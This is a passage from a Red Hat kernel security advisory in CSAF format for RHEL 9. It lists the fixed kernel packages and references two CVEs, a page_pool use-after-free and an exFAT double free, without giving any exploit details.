| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:3066 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2376034 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2376377 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2025-38129 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2376034 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-38129 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-38129 | external |
| https://lore.kernel.org/linux-cve-announce/202507… | external |
| https://access.redhat.com/security/cve/CVE-2025-38206 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2376377 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-38206 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-38206 | external |
| https://lore.kernel.org/linux-cve-announce/202507… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for kernel is now available for Red Hat Enterprise Linux 9.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: page_pool: Fix use-after-free in page_pool_recycle_in_ring (CVE-2025-38129)\n\n* kernel: Kernel: Double free vulnerability in exFAT filesystem can lead to denial of service (CVE-2025-38206)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:3066",
"url": "https://access.redhat.com/errata/RHSA-2026:3066"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2376034",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376034"
},
{
"category": "external",
"summary": "2376377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376377"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_3066.json"
}
],
"title": "Red Hat Security Advisory: kernel security update",
"tracking": {
"current_release_date": "2026-04-13T08:35:47+00:00",
"generator": {
"date": "2026-04-13T08:35:47+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:3066",
"initial_release_date": "2026-02-23T10:50:56+00:00",
"revision_history": [
{
"date": "2026-02-23T10:50:56+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-02-23T10:50:56+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-13T08:35:47+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux BaseOS (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:9::baseos"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::crb"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::nfv"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::realtime"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel-matched@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel-matched@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "perf-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "perf-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rv-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "rv-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "rv-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-aarch64@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
